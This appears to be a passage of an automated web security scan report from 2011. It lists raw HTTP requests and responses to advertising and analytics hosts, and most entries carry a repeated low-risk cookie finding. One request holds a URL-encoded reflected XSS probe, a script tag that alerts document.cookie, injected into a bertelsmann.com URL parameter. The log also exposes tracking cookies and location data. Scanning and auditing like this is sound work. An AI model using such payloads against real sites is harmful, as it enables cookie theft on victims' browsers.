GET /adsc/d840009/7/41115363/decide.php HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome;kw=hp-igsusa-apr;sz=640x480;ord=4922060? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adscgen/st.php?survey_num=851211&site=60069804&code=39864914&randnum=6031698 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00047/47000000000040614.1?!&&PID=8370651&UIT=G&TargetID=8192380&AN=2047363577&PG=CP49XU&ASID=592c970828da41888e4fe12bfdeb5382&destination=;ord=2047363577? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?rn=1303842937293&c7=http%3A%2F%2Fwww.msn.com%2F&c1=2&c2=3000001 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Tue, 26 Apr 2011 18:35:28 GMT Connection: close Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 25-Apr-2013 18:35:28 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r?c2=3000001&d.c=gif&d.o=msnportalauto&d.x=123478899&d.t=page&d.u=http%3A%2F%2Fhome.autos.msn.com%2Fdefault.aspx HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://home.autos.msn.com/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Tue, 26 Apr 2011 18:41:30 GMT Connection: close Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 25-Apr-2013 18:41:30 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bh/set.aspx?action=add&advid=2532&token=AMQU2 HTTP/1.1 Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/mobile/builder/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1
Response
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 CW-Server: cw-web83 Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Fri, 20-Apr-2012 21:46:55 GMT; Path=/ Set-Cookie: cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2; Domain=.contextweb.com; Expires=Wed, 30-Mar-2016 21:46:55 GMT; Path=/ Content-Type: image/gif Date: Tue, 26 Apr 2011 21:46:55 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/bstats.gif?kid=48027945&bapid=11748&uid=560800 HTTP/1.1 Host: bstats.adbrite.com Proxy-Connection: keep-alive Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZGSa0UpzU5OtUqTyTYLKd11Y9agRE%2BDwRKYo%2Bz%2FwRgf"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; vsd=0@1@4db4c1a2@fls.doubleclick.net
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe3w.aspx&lng=en-US&tz=-5&scr=1920x1200x16&rid=e163ec17625448e79673fc4fba538687&udc=true&rnd=1303842940067&RedC=c.msn.com&MXFR=B506C07761D7465D924574124E3C14DF HTTP/1.1 Host: c.atdmt.com Proxy-Connection: keep-alive Referer: http://www.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /srv/oreo?c.realtor.com HTTP/1.1 Host: c.homestore.com Proxy-Connection: keep-alive Referer: http://www.realtor.com/search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html><head><title>Document moved</title></head> <body><h1>Document moved</h1> This document has moved <a href="http://c.realtor.com/srv/sugar?hsid=561c652c36_R_63:10.160.4.250:369843579958:R">here< ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe3w.aspx&lng=en-US&tz=-5&scr=1920x1200x16&rid=e163ec17625448e79673fc4fba538687&udc=true&rnd=1303842940067 HTTP/1.1 Host: c.msn.com Proxy-Connection: keep-alive Referer: http://www.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /srv/sugar?hsid=561c65cde6_R_a8:10.160.4.250:369843621350:R HTTP/1.1 Host: c.realtor.com Proxy-Connection: keep-alive Referer: http://www.realtor.com/search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: criteria=sby=3&loc=75207&usrloc=75207&typ=3&status=1; recAlertSearch=recAlertShown=false&sameSrch=false&saveLstCnt=0&sid=; RecentSearch=loc%3dNew+York%2c+NY%26typ%3d3%26mnp%3d%26mxp%3d%26bd%3d0%26bth%3d0%26status%3d1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img/bh.gif?n=162&g=20&a=313&s=1&l=1&t=r HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.randomhouse.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1; ZFFAbh=845B826,20|1117_846#366Z798_845#365
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 88 Content-Type: image/gif Set-Cookie: FFAbh=847B162,20|313_1#365;expires=Wed, 25 Apr 2012 22:05:53 GMT;domain=.zedo.com;path=/; ETag: "85ecfbee-7054-49420a02cd680" X-Varnish: 1708187920 1708184115 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=30394 Expires: Wed, 27 Apr 2011 06:32:27 GMT Date: Tue, 26 Apr 2011 22:05:53 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/cbglobal/1/H.20.3/s62270389322657?AQB=1&ndh=1&t=26/3/2011%2013%3A40%3A59%202%20300&pageName=www.careerbuilder.com/iframe/recommendedcvupload.aspx&g=http%3A//www.careerbuilder.com/iframe/recommendedcvupload.aspx%3Fpagever%3DNewMSN&r=http%3A//msn.careerbuilder.com/msn/default.aspx&cc=USD&server=www&events=event18%2Cevent19&v11=NotRegistered&v15=NO_NotRegistered&c35=New&v35=New&c36=1&v36=1&c37=First%20Visit&v37=First%20Visit&c40=1%3A30PM&v40=1%3A30PM&c41=Tuesday&v41=Tuesday&c42=Weekday&v42=Weekday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=290&bh=220&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: cbglobal.112.2o7.net Proxy-Connection: keep-alive Referer: http://www.careerbuilder.com/iframe/recommendedcvupload.aspx?pagever=NewMSN User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/ranhrollup/1/H.22.1/s74779692005831?AQB=1&ndh=1&t=26%2F3%2F2011%2017%3A6%3A2%202%20300&ns=randomhouse&pageName=RH.com%20Homepage&g=http%3A%2F%2Fwww.randomhouse.com%2F&cc=USD&events=event8&c24=www.randomhouse.com%2F&v24=www.randomhouse.com%2F&c25=www.randomhouse.com%2F&v25=www.randomhouse.com%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: code.randomhouse.com Proxy-Connection: keep-alive Referer: http://www.randomhouse.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img/bh.gif?n=826&g=20&a=1117&s=$t&l=1&t=i&e=1 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZFFAbh=845B826,20|798_845#365; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 88 Content-Type: image/gif Set-Cookie: ZFFAbh=845B826,20|1117_846#366Z798_845#365;expires=Wed, 25 Apr 2012 18:46:37 GMT;domain=.zedo.com;path=/; ETag: "1822b1a-7054-4942082502f40" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" X-Varnish: 2559125543 Cache-Control: max-age=44578 Expires: Wed, 27 Apr 2011 07:09:35 GMT Date: Tue, 26 Apr 2011 18:46:37 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/www.bertelsmann.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.bertelsmann.com%2Fbertelsmann_corp%2Fwms41%2Fbm%2Findex.php%3Flanguage%3D2%2650700%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ee85a0f4245a%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F38&11jhoxa HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303775135.1FE|1303775135.60; psc=4; uid=4dab4fa85facd099
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /HG?hc=&hb=DM5710248PED62EN3&cd=1&hv=6&n=Setting%20MSN%20as%20your%20homepage&con=&vcon=/&tt=none&ja=y&dt=13&zo=300&lm=1290645554000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&np=Win32&nc=u&vpc=HBX0250u&vjs=HBX0250.11u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos,name&ra=&cv.c49=&cv.c50=http%3A//www.myhomemsn.com/&rf=bookmark&pu=&pl=Shockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.240.7%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AChrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AWPI%20Detector%201.3%3AGoogle%20Update%3ADefault%20Plug-in%3A&lv.id=&lv.pos=&hid=0.7830267860554159 HTTP/1.1 Host: ehg-gaddispartners.hitbox.com Proxy-Connection: keep-alive Referer: http://www.myhomemsn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WSS_GW=V1z%XrXe@%r@Q; CTG=1303671314
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /windows-live-messenger?os=other HTTP/1.1 Host: explore.live.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104; wla42=
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getuidu?http://a.rfihub.com/cm?apxuid=$UID&forward= HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?
Response
HTTP/1.1 302 Moved Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:46:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:49 GMT; domain=.adnxs.com; HttpOnly Location: http://a.rfihub.com/cm?apxuid=2724386019227846218&forward= Date: Tue, 26 Apr 2011 18:46:49 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pxj?bidder=18&action=setuids('614741349159218131','1CAESEAcpLdw2F6J1UKMXA_aMRok');&redir=http%3A%2F%2Fib.adnxs.com%2Fgetuidu%3Fhttp%3A%2F%2Fa.rfihub.com%2Fcm%3Fapxuid%3D%24UID%26forward%3D HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; sess=1; uuid2=2724386019227846218
Response
